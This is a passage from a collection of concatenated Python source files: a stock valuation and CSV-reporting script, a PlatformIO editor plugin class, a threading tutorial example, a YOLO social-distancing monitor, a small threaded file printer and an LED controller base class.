            s_rim_price = valuator.s_rim_calculator_us(df_investing, expected_income_ratio, current_price)
            if s_rim_price > current_price:
                print("S-RIM: BUY {}".format(stock_name_to_print))
                s_rim_buy.append((stock_code, int(s_rim_price)))
            else:
                print("S-RIM: DON'T BUY {}".format(stock_name_to_print))
            # Templeton valuation: strong buy below fair price, consider below 2x.
            templeton_price = valuator.templeton_price_calculator_us(df_investing)
            if templeton_price > current_price:
                print("Templeton: Strong BUY {}".format(stock_name_to_print))
                templeton_buy.append((stock_code, int(templeton_price)))
            elif (templeton_price * 2) > current_price:
                print("Templeton: Consider BUY {}".format(stock_name_to_print))
                templeton_buy.append((stock_code, int(templeton_price)))
            else:
                print("Templeton: DON'T BUY {}".format(stock_name_to_print))
            fs_score = valuator.calculate_fs_score_us(df_investing, df_financial)
            if fs_score >= 7:
                print("FS score: GOOD {}".format(stock_name_to_print))
            p_fs = fs_score / 10
            moat = valuator.is_economic_moat_us(df_investing, df_financial)
            ebit_ev = valuator.get_ebit_ev_us(df_financial, ev)
            gpa = valuator.get_gpa_us(df_financial)
            roic = float(df_investing.loc[20][1].replace('%', ''))
            roa_8, roic_8, fcfa_8, p_mm = valuator.calc_economic_moat_us(df_investing, df_financial)
            # Persist the raw frames so they can be re-processed offline later
            # (see us_run_from_files).
            df_investing.to_csv(data_dir + stock_code + "_investing.csv", mode="w")
            df_financial.to_csv(data_dir + stock_code + "_financial.csv", mode="w")
            # Row layout must match the module-level ``columnlist``.
            dfcontents.append(stock_code)
            dfcontents.append(stock_code_name_dict[stock_code])
            dfcontents.append("{:.2f}".format(current_price))
            dfcontents.append("{:.2f}".format(ev_cf_ratio))    # EV/CashFlow
            dfcontents.append(df_investing.loc[1][1])          # EPS Consolidated
            dfcontents.append(df_investing.loc[8][1])          # PBR
            dfcontents.append(df_investing.loc[3][1])          # dividend
            dfcontents.append(df_investing.loc[18][1])         # ROE
            dfcontents.append("{:.2f}".format(roa_8 * 100))    # ROA(8)
            dfcontents.append("{:.2f}".format(roic_8 * 100))   # ROIC(8)
            dfcontents.append("{:.2f}".format(fcfa_8 * 100))   # FCFA(8)
            dfcontents.append(p_mm)                            # MM
            dfcontents.append(ebit_ev)                         # EBIT/EV
            dfcontents.append(gpa)                             # GPA
            dfcontents.append(roic)                            # ROIC
            dfcontents.append("{:.2f}".format(s_rim_price))
            dfcontents.append("{:.2f}".format(((s_rim_price - current_price) / current_price) * 100) + "%")
            dfcontents.append("{:.2f}".format(templeton_price))
            # Templeton rank: 1 = strong buy, 2 = consider, 99 = don't buy.
            if templeton_price > current_price:
                dfcontents.append(1)
            elif (templeton_price * 2) > current_price:
                dfcontents.append(2)
            else:
                dfcontents.append(99)
            dfcontents.append(p_fs)
            dfcontents.append('{:.2f}%'.format(sta))
            dfcontents.append('{:.2f}%'.format(snoa))
            dfcontents.append(moat)
            if len(dfcontents) > 0:
                alldfcontents.append(dfcontents)
                dfcontents = []
        # BUG FIX: the original caught Exception and tested ``e == KeyboardInterrupt``,
        # which compares an instance to a class (always False) and is unreachable
        # anyway because KeyboardInterrupt does not derive from Exception in Py3.
        except KeyboardInterrupt:
            break
        except Exception as e:
            revisit_contents.append(stock_code)
            revisit_contents.append(stock_code_name_dict.get(stock_code, ""))
            revisit_contents.append(str(e))
            all_revisit_contents.append(revisit_contents)
            revisit_contents = []
            continue
    result_df = pd.DataFrame(columns=columnlist, data=alldfcontents)
    print(result_df)
    result_file = result_file_header + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
    print("result_file = {}".format(result_file))
    result_df.to_csv(result_file, mode="w")
    # BUG FIX: the original condition ``len(all_revisit_contents[0]) > 3`` could
    # never be True (each revisit row has exactly 3 fields), so the revisit list
    # was never written.  Write it whenever any stock failed.
    if all_revisit_contents:
        revisit_columns = ['code', 'name', 'reason']
        revisit_df = pd.DataFrame(columns=revisit_columns, data=all_revisit_contents)
        revisit_df.to_csv('revisit_list_' + now.strftime("%Y%m%d") + "_" + str(proc_num) + '.csv', mode="w")
def us_run_from_files(us_codes, proc_num, data_location="./itooza/us/20200207/", result_file_header="./result_data/us_choosen_"):
    """Re-run the valuations from previously saved itooza CSV snapshots.

    Same pipeline as us_run(), but per-stock investing/financial frames are
    loaded from *data_location* instead of being scraped live.

    Arguments:
        us_codes -- iterable of (stock_code, stock_name) pairs
        proc_num -- worker-process index, used in output file names
        data_location -- directory holding the saved snapshot CSVs
        result_file_header -- prefix of the per-process result CSV
    """
    print("proc_num = {}".format(proc_num))
    stock_code_name_dict = {}
    s_rim_buy = []
    templeton_buy = []
    alldfcontents = []
    dfcontents = []
    all_revisit_contents = []
    revisit_contents = []
    for us_code in us_codes:
        try:
            stock_code = us_code[0]
            stock_code_name_dict[stock_code] = us_code[1]
            s_rim_price = 0
            templeton_price = 0
            # The date component of data_location selects which snapshot to read.
            df_investing, df_financial, current_price, ev = data_collector.read_data_from_files_us(stock_code, data_location.split('/')[-2])
            print(df_investing)
            print(df_financial)
            ev_cf_ratio = valuator.calculate_ev_cf_ratio(ev, df_financial)
            print("EV/CashFlow = {}".format(ev_cf_ratio))
            sta, snoa = valuator.calculate_sta_snoa_probm_us(df_financial)
            # S-RIM valuation
            s_rim_price = valuator.s_rim_calculator_us(df_investing, expected_income_ratio, current_price)
            if s_rim_price > current_price:
                print("S-RIM: BUY {}".format(stock_code))
                s_rim_buy.append((stock_code, int(s_rim_price)))
            else:
                print("S-RIM: DON'T BUY {}".format(stock_code))
            # Templeton valuation
            templeton_price = valuator.templeton_price_calculator_us(df_investing)
            if templeton_price > current_price:
                print("Templeton: Strong BUY {}".format(stock_code))
                templeton_buy.append((stock_code, int(templeton_price)))
            elif (templeton_price * 2) > current_price:
                print("Templeton: Consider BUY {}".format(stock_code))
                templeton_buy.append((stock_code, int(templeton_price)))
            else:
                print("Templeton: DON'T BUY {}".format(stock_code))
            fs_score = valuator.calculate_fs_score_us(df_investing, df_financial)
            if fs_score >= 7:
                print("FS score: GOOD {}".format(stock_code))
            p_fs = fs_score / 10
            moat = valuator.is_economic_moat_us(df_investing, df_financial)
            ebit_ev = valuator.get_ebit_ev_us(df_financial, ev)
            gpa = valuator.get_gpa_us(df_financial)
            roic = float(df_investing.loc[20][1].replace('%', ''))
            roa_8, roic_8, fcfa_8, p_mm = valuator.calc_economic_moat_us(df_investing, df_financial)
            # Re-save the frames under today's directory; unlike us_run() this
            # function never created it, so guard with exist_ok.
            out_dir = "./itooza/us/" + now.strftime("%Y%m%d") + "/"
            os.makedirs(out_dir, exist_ok=True)
            df_investing.to_csv(out_dir + stock_code + "_investing.csv", mode="w")
            df_financial.to_csv(out_dir + stock_code + "_financial.csv", mode="w")
            # Row layout must match the module-level ``columnlist`` (23 columns).
            dfcontents.append(stock_code)
            # BUG FIX: the original omitted the 'name' column, producing 22-item
            # rows against a 23-column header, which makes the
            # pd.DataFrame(...) constructor below raise.
            dfcontents.append(stock_code_name_dict[stock_code])
            dfcontents.append("{:.2f}".format(current_price))
            dfcontents.append("{:.2f}".format(ev_cf_ratio))    # EV/CashFlow
            dfcontents.append(df_investing.loc[1][1])          # EPS Consolidated
            dfcontents.append(df_investing.loc[8][1])          # PBR
            dfcontents.append(df_investing.loc[3][1])          # dividend
            dfcontents.append(df_investing.loc[18][1])         # ROE
            dfcontents.append("{:.2f}".format(roa_8 * 100))    # ROA(8)
            dfcontents.append("{:.2f}".format(roic_8 * 100))   # ROIC(8)
            dfcontents.append("{:.2f}".format(fcfa_8 * 100))   # FCFA(8)
            dfcontents.append(p_mm)                            # MM
            dfcontents.append(ebit_ev)                         # EBIT/EV
            dfcontents.append(gpa)                             # GPA
            dfcontents.append(roic)                            # ROIC
            dfcontents.append("{:.2f}".format(s_rim_price))
            dfcontents.append("{:.2f}".format(((s_rim_price - current_price) / current_price) * 100) + "%")
            dfcontents.append("{:.2f}".format(templeton_price))
            # Templeton rank: 1 = strong buy, 2 = consider, 99 = don't buy.
            if templeton_price > current_price:
                dfcontents.append(1)
            elif (templeton_price * 2) > current_price:
                dfcontents.append(2)
            else:
                dfcontents.append(99)
            dfcontents.append(p_fs)
            dfcontents.append('{:.2f}%'.format(sta))
            dfcontents.append('{:.2f}%'.format(snoa))
            dfcontents.append(moat)
            if len(dfcontents) > 0:
                alldfcontents.append(dfcontents)
                dfcontents = []
        # BUG FIX: KeyboardInterrupt is not an Exception subclass in Py3 and the
        # original ``e == KeyboardInterrupt`` instance-vs-class test was always
        # False; give it its own handler.
        except KeyboardInterrupt:
            break
        except Exception as e:
            revisit_contents.append(stock_code)
            revisit_contents.append(str(e))
            all_revisit_contents.append(revisit_contents)
            revisit_contents = []
            continue
    result_df = pd.DataFrame(columns=columnlist, data=alldfcontents)
    print(result_df)
    result_file = result_file_header + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
    print("result_file = {}".format(result_file))
    result_df.to_csv(result_file, mode="w")
    # BUG FIX: the original only wrote the revisit list after more than three
    # failures; write it whenever any stock failed.
    if all_revisit_contents:
        revisit_columns = ['code', 'reason']
        revisit_df = pd.DataFrame(columns=revisit_columns, data=all_revisit_contents)
        revisit_df.to_csv('revisit_list_' + now.strftime("%Y%m%d") + "_" + str(proc_num) + '.csv', mode="w")
def concat_dataframes(result_file_name, cnt, result_file_header="./result_data/us_choosen_"):
    """Merge the per-process result CSVs into one ranked CSV file.

    Reads ``<result_file_header><YYYYMMDD>_<proc>.csv`` for proc in
    [0, cnt), concatenates them, adds composite quality/value ranking
    columns, and writes the combined frame to *result_file_name*.

    Arguments:
        result_file_name -- path of the combined output CSV
        cnt -- number of worker processes (and thus input files)
        result_file_header -- prefix of the per-process input CSVs
    """
    dfs = []
    for proc_num in range(0, cnt):
        result_file = result_file_header + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
        print("result_file = {}".format(result_file))
        try:
            dfs.append(pd.read_csv(result_file))
        except Exception as e:
            print("File not opened {} with exception ({}).".format(result_file, e))
            continue
    # BUG FIX: pd.concat raises ValueError on an empty list; bail out cleanly
    # when no per-process file could be read.
    if not dfs:
        print("No result files could be read; skipping concatenation.")
        return
    result_df = pd.concat(dfs)
    # rank(ascending=0): rank 1 corresponds to the largest (best) value.
    result_df['EBIT/EV rank'] = result_df['EBIT/EV'].rank(ascending=0)
    result_df['GPA rank'] = result_df['GPA'].rank(ascending=0)
    result_df['P_FP'] = (result_df['ROA(8)%'] + result_df['ROIC(8)%'] + result_df['FCFA(8)%'] + result_df['P_MM']) / 4
    result_df['P_FS rank'] = result_df['P_FS'].rank(ascending=0)
    result_df['P_FP rank'] = result_df['P_FP'].rank(ascending=0)
    # Composite quality-value score: equal-weight franchise power and
    # financial strength.
    result_df['QV'] = 0.5 * result_df['P_FP'] + 0.5 * result_df['P_FS']
    result_df['QV rank'] = 0.5 * result_df['P_FP rank'] + 0.5 * result_df['P_FS rank']
    # Drop the unnamed index column produced when the per-process CSVs were written.
    result_df.drop(result_df.columns[[0]], axis=1, inplace=True)
    result_df.to_csv(result_file_name)
def send_email(result_file_name):
    """Email the result CSV as an attachment via Naver SMTP.

    Credentials are intentionally left blank in source; fill them in
    before enabling this function.

    Arguments:
        result_file_name -- path of the CSV file to attach and reference
                            in the message body
    """
    sendEmail = ""  # Need to sender's naver email address
    recvEmail = ""  # Need to receiver email address
    password = ""   # Need to naver password
    smtpName = "smtp.naver.com"  # smtp server address
    smtpPort = 587               # smtp port (STARTTLS)
    msg = MIMEMultipart()
    msg['Subject'] = "[{}] Valuation Result for US Stock Market".format(now.strftime("%Y-%m-%d"))
    msg['From'] = sendEmail
    msg['To'] = recvEmail
    text = "[{}] The calculated result is attached as {}.".format(now.strftime("%Y-%m-%d"), result_file_name)
    msg.attach(MIMEText(text))
    with open(result_file_name, "rb") as fil:
        part = MIMEApplication(fil.read(), Name=result_file_name)
    # After the file is closed
    part['Content-Disposition'] = 'attachment; filename="%s"' % result_file_name.split('/')[-1]
    msg.attach(part)
    print(msg.as_string())
    s = smtplib.SMTP(smtpName, smtpPort)  # connect mail server
    try:
        s.starttls()  # TLS security
        # BUG FIX: the original called s.login("", password), authenticating
        # with an empty user regardless of the configured sender.
        s.login(sendEmail, password)
        s.sendmail(sendEmail, recvEmail, msg.as_string())
    finally:
        # Always release the SMTP connection, even if login/send fails.
        s.close()
if __name__ == "__main__":
    # Entry point: split the stock list into chunks and value them in
    # parallel worker processes, then merge the per-process CSVs.
    procs = []
    process_cnt = 1
    stock_cnt = 6714
    login_id = ""
    login_passwd = ""
    try:
        os.makedirs("./result_data/")
        print("Directory ", "./result_data/", " Created ")
    except FileExistsError:
        print("Directory ", "./result_data/", " Already exists")
    result_file_header = "./result_data/us_choosen_"
    chunk = int(stock_cnt / process_cnt)
    print("len(argv) = {}".format(len(sys.argv)))
    for t in sys.argv:
        print("argv = {}".format(t))
    # argv layout: [script, stock_code_file, login_id, login_passwd], all optional.
    if len(sys.argv) >= 2:
        stock_code_file = sys.argv[1]
    if len(sys.argv) >= 3:
        login_id = sys.argv[2]
    if len(sys.argv) >= 4:
        login_passwd = sys.argv[3]
    # BUG FIX: the original leaked the open file handle; use a context manager.
    with open(stock_code_file, 'r') as f:
        tmp_us_codes = list(csv.reader(f))
    print(len(tmp_us_codes))
    print(tmp_us_codes)
    us_codes = [tmp_us_codes[i * chunk:(i + 1) * chunk] for i in range((len(tmp_us_codes) + chunk - 1) // chunk)]
    print(len(us_codes))
    print("chunk = {}".format(chunk))
    time.sleep(5)
    # BUG FIX: guard against an input file that yields fewer chunks than
    # workers, which would make us_codes[index] raise IndexError.
    for index in range(0, min(process_cnt, len(us_codes))):
        proc = Process(target=us_run, args=(us_codes[index], index, chunk, login_id, login_passwd))
        procs.append(proc)
        proc.start()
    for proc in procs:
        proc.join()
    concat_dataframes(result_file_header + now.strftime("%Y%m%d") + ".csv", process_cnt, "./result_data/us_choosen_")
#send_email(result_file_header + now.strftime("%Y%m%d") + ".csv") |
pio_bridge.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
from glob import glob
from ..libraries import paths
from ..libraries.file import File
from ..libraries.tools import get_setting
from .command import Command
class PioBridge(Command):
    """Bridge between the Sublime Text plugin commands and PlatformIO
    project files (boards list, platformio.ini environments, paths)."""

    def __init__(self):
        super(PioBridge, self).__init__()
        # Cache the working path (where platformio.ini lives) for later use.
        self.cwd = self.get_working_project_path()

    def save_boards_list_async(self):
        """Save boards list async

        Stores the board list file in a new thread to avoid
        blocking the Sublime Text UI.
        """
        from threading import Thread
        from ..libraries.thread_progress import ThreadProgress
        from ..libraries.I18n import I18n
        from ..beginning.install_pio import save_board_list

        txt = I18n().translate('processing')
        thread = Thread(target=save_board_list)
        thread.start()
        ThreadProgress(thread, txt, '')

    def get_boards_list(self):
        """Board List

        Get the json file with the list of boards and return it.
        The location of the json file is defined in paths.py in the
        function getBoardsFileDataPath.

        Returns:
            json -- list of boards
        """
        board_file_path = paths.getBoardsFileDataPath()
        file = File(board_file_path)
        # BUG FIX: the original passed the undefined name ``boards`` to
        # read_json(), which raised NameError on every call.
        # NOTE(review): assumes File.read_json() takes no required argument —
        # confirm against libraries/file.py.
        boards_list = file.read_json()
        return boards_list

    def remove_ini_environment(self, board_id):
        """Remove Environment

        Removes the environment section from the platformio.ini file.
        It happens each time an environment/board is removed by selecting it
        from the list of boards (Select Board): if the board isn't in the
        configs it is added, otherwise it is removed.

        Arguments:
            board_id {str} -- board identifier, e.g. 'uno'
        """
        # BUG FIX: the original tested the bound method object
        # ``self.is_initialized`` (always truthy) instead of calling it.
        if self.is_initialized():
            from ..libraries.readconfig import ReadConfig
            file_path = self.get_ini_path()
            config = ReadConfig()
            config.read(file_path)
            environment = 'env:' + board_id
            if config.has_section(environment):
                config.remove_section(environment)
            # Write the (possibly unchanged) config back to disk.
            with open(file_path, 'w') as configfile:
                config.write(configfile)

    def get_working_project_path(self):
        """Working Path

        The working path is where platformio.ini is located;
        it's used each time deviot compiles the code.

        Returns:
            str -- path/working_path (or None when no project is open)
        """
        pio_structure = self.get_structure_option()
        if pio_structure:
            project_path = self.get_project_path()
            if not project_path:
                return None
            # If an ini file already exists, the project root is its parent.
            ini_path = self.get_ini_path()
            if ini_path:
                project_path = self.get_parent_path()
            return project_path
        if self.is_initialized():
            ini_path = self.get_ini_path()
            working_path = os.path.dirname(ini_path)
            return working_path
        # Fall back to a temporary project location.
        return self.get_temp_project_path()

    def get_structure_option(self):
        """Pio Structure Option

        Check if the platformio structure option is enabled.

        Returns:
            bool -- True to keep working with the platformio structure
        """
        return get_setting('pio_structure', False)
|
Item53.py | """
Item 53: Use Threads for Blocking I/O, Avoid for Parallelism
"""
"""
Python threads cannot run in parallel on multiple cores because of the GIL.
Python threads can be useful since the code will appear as if multiple things
are executing at the same time.
System calls will excecute in parallel when using Python threads.
This allows you to use blocking I/O at the same time as computation.
Blocking I/O includes reading and writing to files, interacting with networks, and communicating
devices.
"""
#!/usr/bin/env PYTHONHASHSEED=1234 python3
# Reproduce book environment
import random
random.seed(1234)
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Write all output to a temporary directory
import atexit
import gc
import io
import os
import tempfile
# All example output goes to a temporary directory removed at interpreter exit.
TEST_DIR = tempfile.TemporaryDirectory()
atexit.register(TEST_DIR.cleanup)

# Make sure Windows processes exit cleanly: restore the original working
# directory before TEST_DIR is cleaned up, since Windows cannot delete a
# directory that is still the current working directory.
OLD_CWD = os.getcwd()
atexit.register(lambda: os.chdir(OLD_CWD))
os.chdir(TEST_DIR.name)

def close_open_files():
    # Close every file object still alive at exit so the temporary
    # directory can be deleted (open handles block deletion on Windows).
    everything = gc.get_objects()
    for obj in everything:
        if isinstance(obj, io.IOBase):
            obj.close()

atexit.register(close_open_files)
# Example 1: a generator yielding the factors of ``number``.
def factorize(number):
    """Yield every positive integer that divides *number* evenly,
    in ascending order (1 and *number* included)."""
    for candidate in range(1, number + 1):
        if number % candidate == 0:
            yield candidate
# Example 2: We execute factorize serially and time the process.
import time

numbers = [2139079, 1214759, 1516637, 1852285]

start = time.time()
for number in numbers:
    # Materialize the generator so every factor is actually computed.
    list(factorize(number))
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')
# Example 3: We use threads to execute factorize "concurrently." Note that the GIL prevents this from
# being truly concurrent. There is no gain in time over a serial implementation.
from threading import Thread
class FactorizeThread(Thread):
    """Thread that factorizes a single number.

    The result is exposed as ``self.factors`` after ``run()`` completes,
    because ``Thread.run`` has no way to return a value.
    """

    def __init__(self, number):
        super().__init__()
        self.number = number

    def run(self):
        self.factors = list(factorize(self.number))
# Example 4: Start the "concurrent" threads.
# The GIL serializes the pure-Python bytecode, so the total time below is
# roughly the same as the serial run in Example 2.
start = time.time()
threads = []
for number in numbers:
    thread = FactorizeThread(number)
    thread.start()
    threads.append(thread)

# Example 5: Wait for all the thread to finish (join()) and time the process.
for thread in threads:
    thread.join()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')
# Example 6: Threading can speed up a program if system calls are involve. System calls will release the GIL
# and allow the Python code to continue as the system call runs in a thread.
import select
import socket
def slow_systemcall():
    """Block for ~0.1 s inside the ``select`` system call.

    The GIL is released for the duration of the call, so many of these
    can overlap across threads.

    BUG FIX: the original created a socket inline and never closed it,
    leaking one file descriptor per call; the context manager closes it.
    """
    with socket.socket() as sock:
        select.select([sock], [], [], 0.1)
# Example 7: A serial example with 5 system call excecute serially.
start = time.time()
for _ in range(5):
    slow_systemcall()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')

# Example 8: We execute system calls in parallel an compute the "helicopter location" in Python
# while system calls run concurrently. This will save time since the GIL is released after the system call.
# Note I altered the code so to show that even with 20 system calls the program is not slowed down.
# Note that I also slowed down the helicopter location function so the Python code runs longer.
start = time.time()
threads = []
for _ in range(20):
    # Each thread blocks inside select(); the GIL is released during the
    # call, so all 20 waits overlap instead of running back-to-back.
    thread = Thread(target=slow_systemcall)
    thread.start()
    threads.append(thread)
# Example 9: The location code here is the Python part of the program. It will run concurrently
# with the system calls. Since the system calls will run in parallel the resulting code will be about
# factor of the-number-of-system-calls faster than a serial implemation.
def compute_helicopter_location(index):
    """Placeholder for the CPU-bound "helicopter location" computation;
    intentionally does nothing and returns None."""
    return None
for i in range(5):
    compute_helicopter_location(i)
    # Busy-loop purely to make the Python-side work take measurable time.
    for j in range(100000): pass
    sub_end = time.time()
    # NOTE(review): measured from the outer ``start``, so each printed time
    # is cumulative since the threads were launched, not per-iteration.
    sub_delta = sub_end - start
    print(f'{i+1}th loc occurred in {sub_delta:.6f} seconds', sub_end, start)
for thread in threads:
    thread.join()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds') |
run_bk3.py | from mylib import config, thread
from mylib.yolo import YOLO
#from mylib.mailer import Mailer
from mylib.detection import detect_people
from imutils.video import VideoStream, FPS
from scipy.spatial import distance as dist
import numpy as np
import argparse, cv2, os, time , imutils
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
#import multiprocessing
#import queue
def main():
    """Run the social-distance / mask monitoring loop.

    Reads frames from a video file or live stream, runs two detectors
    (a YOLO mask classifier and a COCO person detector), flags
    social-distance violations, renders the annotated frame, and
    optionally plots a density map of violator positions.
    """
    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--input", type=str, default="mylib/videos/test.mp4",
                    help="path to (optional) input video file")
    ap.add_argument("-o", "--output", type=str, default="",
                    help="path to (optional) output video file")
    ap.add_argument("-d", "--display", type=int, default=1,
                    help="whether or not output frame should be displayed")
    args = vars(ap.parse_args())
    labelsPath = os.path.sep.join([config.MODEL_PATH, "coco.names"])
    LABELS = open(labelsPath).read().strip().split("\n")
    # derive the paths to the YOLO weights and model configuration
    weightsPath = os.path.sep.join([config.MODEL_PATH, "yolo-fastest.weights"])
    configPath = os.path.sep.join([config.MODEL_PATH, "yolo-fastest.cfg"])
    # Mask classifier classes and their box colors (grey/orange-ish/red).
    classes = ["good", "bad", "none"]
    yolo = YOLO("models/yolo-fastest.cfg", "models/yolo-fastest.weights", classes)
    yolo.size = 416
    yolo.confidence = 0.5
    colors = [(200, 200, 200), (0, 165, 255), (0, 0, 200)]
    # Frame counter shared with plot() (it skips the first frame).
    global count
    count = 0
    # load our YOLO object detector trained on COCO dataset (80 classes)
    net = cv2.dnn.readNetFromDarknet(configPath, weightsPath)
    if config.USE_GPU:
        # set CUDA as the preferable backend and target
        print("")
        print("[INFO] Looking for GPU")
        net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
        net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
    # determine only the *output* layer names that we need from YOLO
    ln = net.getLayerNames()
    ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
    # NOTE(review): "--input" has a non-empty default, so this live-stream
    # branch is only reachable when the caller passes an empty string.
    if not args.get("input", False):
        print("[INFO] Starting the live stream..")
        vs = cv2.VideoCapture(config.url)
        if config.Thread:
            cap = thread.ThreadingClass(config.url)
        time.sleep(2.0)
    else:
        print("[INFO] Starting the video..")
        vs = cv2.VideoCapture(args["input"])
        if config.Thread:
            cap = thread.ThreadingClass(args["input"])
    fps = FPS().start()
    fig, ax1 = plt.subplots()
    # loop over the frames from the video stream
    while True:
        count += 1
        px = np.array([])
        py = np.array([])
        # read the next frame from the file
        # BUG FIX: in the threaded branch the original never assigned
        # ``grabbed`` but still tested it below, raising NameError on the
        # first frame; derive it from the returned frame instead.
        if config.Thread:
            frame = cap.read()
            grabbed = frame is not None
        else:
            (grabbed, frame) = vs.read()
        # if the frame was not grabbed, we have reached the end of the stream
        if not grabbed:
            break
        width, height, inference_time, mask_results = yolo.inference(frame)
        # detect people (and only people) in the frame
        results = detect_people(frame, net, ln,
                                personIdx=LABELS.index("person"))
        # indexes violating the max/min social distance limits
        serious = set()
        abnormal = set()
        # ensure there are *at least* two people detections (required in
        # order to compute our pairwise distance maps)
        if len(results) >= 2:
            # draw the mask-classifier detections
            for detection in mask_results:
                det_id, name, confidence, x, y, w, h = detection
                color = colors[det_id]
                cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
                text = "%s (%s)" % (name, round(confidence, 2))
                cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
            # extract all centroids and compute pairwise Euclidean distances
            centroids = np.array([r[2] for r in results])
            D = dist.cdist(centroids, centroids, metric="euclidean")
            # loop over the upper triangular of the distance matrix
            for i in range(0, D.shape[0]):
                for j in range(i + 1, D.shape[1]):
                    # centroid pairs closer than the configured minimum
                    if D[i, j] < config.MIN_DISTANCE:
                        serious.add(i)
                        serious.add(j)
                    # below the max limit, but only while nothing is serious yet
                    if (D[i, j] < config.MAX_DISTANCE) and not serious:
                        abnormal.add(i)
                        abnormal.add(j)
        # annotate every person detection
        for (i, (prob, bbox, centroid)) in enumerate(results):
            (startX, startY, endX, endY) = bbox
            (cX, cY) = centroid
            color = (200, 200, 200)
            # color by violation severity
            if i in serious:
                color = (50, 200, 200)
            elif i in abnormal:
                color = (100, 255, 255)  # orange = (0, 165, 255)
            cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
            cv2.circle(frame, (cX, cY), 5, color, 2)
            # accumulate centroid positions for the density plot
            px = np.append(px, cX)
            py = np.append(py, cY)
        # draw some of the parameters
        Safe_Distance = "Safe distance: >{} px".format(config.MAX_DISTANCE)
        cv2.putText(frame, Safe_Distance, (470, frame.shape[0] - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.60, (255, 0, 0), 2)
        Threshold = "Threshold limit: {}".format(config.Threshold)
        cv2.putText(frame, Threshold, (470, frame.shape[0] - 50), cv2.FONT_HERSHEY_SIMPLEX, 0.60, (255, 0, 0), 2)
        # draw the total number of social distancing violations
        text = "Total serious violations: {}".format(len(serious))
        cv2.putText(frame, text, (10, frame.shape[0] - 55), cv2.FONT_HERSHEY_SIMPLEX, 0.70, (0, 0, 255), 2)
        text1 = "Total abnormal violations: {}".format(len(abnormal))
        cv2.putText(frame, text1, (10, frame.shape[0] - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.70, (0, 255, 255), 2)
        # plot a density map once enough violations accumulate
        if len(serious) > 2 or len(abnormal) > 2:
            plt.ion()
            plot(ax1, frame, px, py)
        if args["display"] > 0:
            # show the output frame
            cv2.imshow("Real-Time Monitoring/Analysis Window", frame)
            key = cv2.waitKey(1) & 0xFF
            # if the `q` key was pressed, break from the loop
            if key == ord("q"):
                break
        # update the FPS counter
        fps.update()
    # stop the timer and display FPS information
    fps.stop()
    print("===========================")
    print("[INFO] Elasped time: {:.2f}".format(fps.elapsed()))
    print("[INFO] Approx. FPS: {:.2f}".format(fps.fps()))
    # close any open windows
    cv2.destroyAllWindows()
def plot(ax1, frame, px, py):
    """Render a Gaussian-KDE density map of violator centroids onto *ax1*.

    Skips the very first frame (``count`` is the module-global frame
    counter maintained by main()), since a density estimate needs
    accumulated points.

    Arguments:
        ax1 -- matplotlib axes to draw on
        frame -- current video frame (only its shape is used for extents)
        px, py -- arrays of centroid x/y coordinates
    """
    if count <= 1:
        return
    ax1.cla()
    kde = gaussian_kde(np.vstack([px, py]))
    grid_x, grid_y = np.mgrid[0:frame.shape[1]:72 * 1j, 0:frame.shape[0]:128 * 1j]
    density = kde(np.vstack([grid_x.flatten(), grid_y.flatten()]))
    ax1.contourf(grid_x, grid_y, density.reshape(grid_x.shape), alpha=0.5)
    ax1.set_xlim(0, frame.shape[1])
    # Image coordinates grow downward, so flip the y axis.
    ax1.set_ylim(0, frame.shape[0])
    plt.gca().invert_yaxis()
    plt.show(block=False)
if __name__ == '__main__':
main() |
thread.py | #!/usr/bin/python
import threading
import time
import glob
import os
l = glob.glob("*.txt")

def loop(x):
    """Print the entire contents of text file *x*.

    BUG FIX / PORT: the original was Python 2 only (the ``file()`` builtin
    and the ``print`` statement) and does not even parse under Python 3;
    ported to ``open()`` + ``print()``, with a context manager so the file
    handle is always closed.
    """
    with open(x, 'r+') as f:
        print('%s' % ''.join(map(str, f.readlines())))

# Dump every .txt file in the working directory, one thread per file.
for name in l:
    t = threading.Thread(target=loop, args=(name,))
    t.start()
|
controller_base.py | ################################################################################
# controller_base.py
#-------------------------------------------------------------------------------
# Base class for a controller to interact with the LED display application
# framework.
#
# By Malcolm Stagg
#
# Copyright (c) 2021 SODIUM-24, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import weakref
import threading
class ControllerBase(object):
"""
Base class to be implemented by all controllers
"""
def __init__(self, config, main_app):
"""
Initialize a controller
"""
self.config = config
self.main_app = weakref.ref(main_app)
self.controller_thread = None
self.stop_event = threading.Event()
def start(self):
"""
Start the controller running
"""
